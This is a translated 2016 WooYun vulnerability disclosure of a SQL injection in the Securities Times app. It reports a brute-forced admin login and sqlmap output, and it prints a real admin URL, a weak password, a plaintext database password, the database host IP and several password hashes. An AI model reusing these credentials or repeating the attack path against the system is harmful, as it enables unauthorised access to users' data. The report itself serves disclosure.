Securities Times (证券时报) APP SQL injection affecting all registered users

ID: 215855
URL: http://www.wooyun.org/bug.php?action=view&id=215855
Vulnerability status: Confirmed by vendor
Title: Securities Times (证券时报) APP SQL injection affecting all registered users
Vulnerability type: SQL injection
Vendor: stcn.com
White hat: 艺术家
Submitted: 2016-06-03 16:23:00
Published: 2016-07-18 16:50:00
Fixed: (not set)
Confirmed: 2016-06-03 00:00:00
Confirm Spend: 0
Tags: (none)
Followers: 0
Favorites: 0
White hat rating: (none)
White hat self-assessed rank: 20
Vendor rating: (none)
Vendor rank: 20
Summary
As in the title.
Vulnerability details

WooYun: A Securities Times vulnerability (involving the APP, database, securities, stock trends, etc.)
Following that report, the APP admin back end can be obtained. Actually that is not even necessary; it can be found directly in the APP:
http://appzd.zxzx.stcn.com/admin/admin/adminLogin.do
Here, brute-forcing the username: the CAPTCHA is broken, so the brute force succeeds directly.

lidongping  123456


Log in.

[Screenshot: 1.png]


Found the SQL injection:

back-end DBMS: MySQL 5.0
Database: zhengquanshibaoapp
[79 tables]
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind


Dumped:
database management system users password hashes:
Previous database password:
Quattro!
Database credentials obtained: the database host is 115.29.185.90, the account is root, and the password hash is B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2.
Admin accounts:
liuyufeng e24d3a6718be9dd73a94a3277c8ee6fa
hemin 143e4ff1b57893f8a62fb729cfa187f6
Entering the back end:

[Screenshot: 3.png]


[Screenshot: 4.png]


[Screenshot: 6.png]


This affects all users of the APP.

Fix recommendation

Status history:
2016-06-03: Details sent to the vendor; awaiting vendor handling
2016-06-03: Vendor confirmed; details disclosed to the vendor only
2016-06-13: Details disclosed to core white hats and domain experts
2016-06-23: Details disclosed to regular white hats
2016-07-03: Details disclosed to intern white hats
2016-07-18: Details disclosed to the public
Vendor reply: Please don't publish this, we are fixing it.
Response: Severity: High; Vulnerability Rank: 20; Confirmed: 2016-06-03 16:45
Comments (comment, commenter, likes, time):

"Please don't publish this, we are fixing it." / 骑虎打狗 / 0 / 2016-06-03 16:48:00